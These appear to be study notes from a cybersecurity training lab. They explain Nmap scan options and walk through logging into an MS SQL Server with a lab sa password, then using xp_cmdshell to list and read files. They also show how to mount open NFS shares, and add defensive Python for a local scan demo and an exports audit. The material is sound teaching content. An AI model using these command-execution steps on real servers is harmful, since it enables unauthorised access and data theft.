Days 10, 11 & 12: Networking - Nmap, MS SQL & NFS (Network File System)

Day 10: Offence is the best defence

Introduction

IP stands for Internet Protocol. To keep things simple, we will consider Internet Protocol version 4 (IPv4). An IPv4 address is made up of 4 decimal numbers. The range for each number is from 0 to 255. Example IPv4 addresses are:

  • 192.168.0.10

  • 172.16.0.100

  • 10.10.11.12

  • 1.1.1.1

  • 127.0.0.1 - loopback address

The first 3 IP addresses in the list above are private, meaning that they can only be accessed from the private network they belong to. The last IP address, 1.1.1.1, is a public IP address that can be accessed by the whole Internet and belongs to Cloudflare.

Protocols and Servers

Summary: UDP has no three-way handshake; TCP needs one (SYN, SYN-ACK, ACK).

To name a few, these are some example TCP/IP protocols:

  • Hypertext Transfer Protocol (HTTP) for serving webpages - 80

  • HTTPS - 443

  • Domain Name System (DNS) for resolving hostnames to IP addresses

  • Post Office Protocol version 3 (POP3) for delivering email - 110

  • Simple Mail Transfer Protocol (SMTP) for sending email - 25

  • Telnet for remote login - 23

  • Secure Shell (SSH) for secure remote login - 22

Nmap

  • TCP Connect Scan: To run this type of scan, the -sT option is required. Nmap will attempt to complete the three-way handshake in order to establish a connection with each port scanned.

  • TCP SYN Scan: You can select this scan with the -sS option, and Nmap will not make a complete connection if the port is open. Technically speaking, Nmap does not complete a TCP three-way handshake.

To better understand the difference between -sT and -sS, we can use the analogy of knocking on a door.

The TCP connect scan (-sT) is like knocking on a door, waiting for someone to open it, greeting each other, then excusing yourself to leave.

The TCP SYN scan (-sS) resembles knocking, and once someone answers, you pretend that it was not you that knocked and walk away innocently. The latter will make it more difficult for the other party to remember you.

-p- to scan all ports

-T4 sets the scanning speed (timing template); T5 is the fastest
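To make the -sT/-sS difference above concrete from the defender's side, here is an added Python example (not part of these notes or of Nmap) that runs a connect scan against a listener on 127.0.0.1 and then shows that the probe of the open port turns up in the service's accept() queue, i.e. as a completed handshake the service can log. A SYN scan resets the connection before the final ACK, so accept() would never see it; that side needs raw sockets and is not reproduced here.

```python
import socket

HOST = "127.0.0.1"  # everything below runs against a local listener, no remote target

def start_listener():
    """Open a listening TCP socket on a free port; it stands in for a scanned service."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((HOST, 0))
    srv.listen(5)
    return srv, srv.getsockname()[1]

def free_closed_port():
    """Reserve then release a port, giving a port number that is almost certainly closed."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind((HOST, 0))
        return s.getsockname()[1]

def connect_scan(ports, timeout=0.5):
    """The -sT mechanism: one full connect() (complete three-way handshake) per port."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((HOST, port)) == 0:  # 0 = handshake completed, port open
                open_ports.append(port)
    return open_ports

def handshakes_seen(srv, wait=1.0):
    """What the service's accept() queue holds after the scan: one entry per full handshake."""
    srv.settimeout(wait)
    seen = []
    while True:
        try:
            conn, addr = srv.accept()
        except socket.timeout:
            return seen
        seen.append(addr)
        conn.close()

def demo():
    srv, open_port = start_listener()
    closed_port = free_closed_port()
    found = connect_scan([open_port, closed_port])
    seen = handshakes_seen(srv)  # the open-port probe is visible here; a closed port leaves nothing
    srv.close()
    return open_port, closed_port, found, len(seen)

if __name__ == "__main__":
    print(demo())
```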

Day 11: Where are the Reindeers

MS SQL Server Introduction

  • relational database management system

  • MS Windows systems do not respond to ping probes by default, so the -Pn flag needs to be added to scans

  • -Pn instructs Nmap to skip pinging the target to check whether the host is reachable; without it, Nmap assumes the target is offline and does not proceed with scanning

How to access MS SQL Server on the target machine:

// sqsh (pronounced "skwish") command
sqsh -S server -U username -P password
--> server can be the IP address of the target running MS SQL Server
// To query a table (replace table_name and condition)
SELECT * FROM table_name WHERE condition;
go

Note that the ; indicates the end of the SQL query, while go sends a SQL batch to the database.

Note that the query won't run unless you send go on a separate line.

XP_CMDSHELL

Some MS SQL Servers have xp_cmdshell enabled. If this is the case, we might have access to something similar to a command prompt.

The command syntax is xp_cmdshell 'COMMAND';. Let’s try a simple command, whoami, which shows the user running the commands. In the terminal output below, after connecting to MS SQL Server, we tried xp_cmdshell 'whoami';, and we can see that the user is nt service\mssqlserver. This means that any command we pass to xp_cmdshell will run as nt service\mssqlserver.

Consider the example in the terminal window below where we reveal the contents of the text file WindowsUpdate.log.

Pentester Terminal

pentester@TryHackMe$ sqsh -S 10.10.34.101 -U sa -P "t7uLKzddQzVjVFJp"
sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
1> xp_cmdshell 'type c:\windows\WindowsUpdate.log';
2> go

        output
[...]
        Windows Update logs are now generated using ETW (Event Tracing for Windows).
        Please run the Get-WindowsUpdateLog PowerShell command to convert ETW traces into a readable WindowsUpdate.log.
        NULL
        NULL
        For more information, please visit https://go.microsoft.com/fwlink/?LinkId=518345
(5 rows affected, return status = 0)
1>

Commands for solving the task: find flag.txt in the grinch user's directory via xp_cmdshell on the MS SQL server

// STEPS
1) sqsh -S 10.10.34.101 -U sa -P "t7uLKzddQzVjVFJp"
2) xp_cmdshell 'dir C:\Users\grinch'
3) We looked around in Documents and found it there as flag.txt
xp_cmdshell 'dir C:\Users\grinch\Documents'
4) xp_cmdshell 'type C:\Users\grinch\Documents\flag.txt'

DONE

Day 12 : Network File System (NFS)

Network File System (NFS) is a protocol that allows files to be transferred between different computers and is available on many systems, including MS Windows and Linux. Consequently, NFS makes it easy to share files between various operating systems.

Let’s check what files are being shared. We can do this using the command showmount. In the terminal below, we run showmount -e 10.10.146.45. The -e or --exports option shows the NFS server’s export list.

pentester@TryHackMe$ showmount -e 10.10.146.45 
Export list for 10.10.146.45: 
/share (everyone) 
/my-notes (noone)

As we can see in the terminal output above, we have two shares, /share and /my-notes.

Let’s try to mount the shares we have discovered. We can create a directory on the AttackBox using mkdir tmp1, where tmp1 is the directory’s name. Then we can use this directory we created to mount the public NFS share using: mount 10.10.146.45:/my-notes tmp1.

pentester@TryHackMe$ mount 10.10.146.45:/my-notes tmp1
mount.nfs: access denied by server while mounting 10.10.146.45:/my-notes

We can see that the mounting has failed. my-notes is not public and requires specific authentication mechanisms that we don’t have access to. Let’s try again with the other folder, share.

pentester@TryHackMe$ mount 10.10.146.45:/share tmp1

We didn’t get any error messages, so it was a success. Let’s go inside the share to see what’s inside it using cd tmp1, then ls.

pentester@TryHackMe$ ls
132-0.txt 2680-0.txt

There are two text files. We can open the file using any text editor such as nano FILENAME or something quicker such as less FILENAME.
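As an added example (not from the room), the following Python parses showmount -e output in the format shown above and, from the server's side, audits a constructed /etc/exports file for the settings that make a share mountable by everyone (a bare * client or, a common mistake, a space before the options) or that let a remote root keep root (no_root_squash). The /etc/exports content, including the /backup entry, is a constructed sample.

```python
import re
# Constructed sample in the format of the showmount -e output shown above.
SHOWMOUNT_OUTPUT = """\
Export list for 10.10.146.45:
/share (everyone)
/my-notes (noone)
"""

# Constructed sample /etc/exports for a hypothetical server (not from the room).
EXPORTS_FILE = """\
/share *(rw,sync,no_root_squash)
/my-notes 10.10.146.0/24(ro,sync)
/backup (rw)   # space before the options: client is empty, so exported to *
"""

WORLD = {"*", "everyone"}  # client specs that mean "any host"

def parse_showmount(text):
    """Map each export path in `showmount -e` output to its client list."""
    exports = {}
    for line in text.splitlines()[1:]:  # skip the "Export list for ..." header
        path, _, clients = line.strip().partition(" ")
        if path:
            exports[path] = [c.strip() for c in clients.strip("() ").split(",") if c.strip()]
    return exports

def world_exports(exports):
    """Paths any host may mount, like /share above."""
    return [p for p, cl in exports.items() if any(c in WORLD for c in cl)]

def audit_exports_file(text):
    """Server-side check: flag risky /etc/exports entries as (path, client, issue)."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *specs = line.split()
        for spec in specs:
            m = re.fullmatch(r"([^(]*)(?:\((.*)\))?", spec)
            client = m.group(1) or "*"  # no client before the options = every host
            opts = (m.group(2) or "").split(",")
            if client in WORLD:
                findings.append((path, client, "exported to every host"))
                if "rw" in opts:
                    findings.append((path, client, "world-writable"))
            if "no_root_squash" in opts:
                findings.append((path, client, "no_root_squash: remote root keeps root"))
    return findings
```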
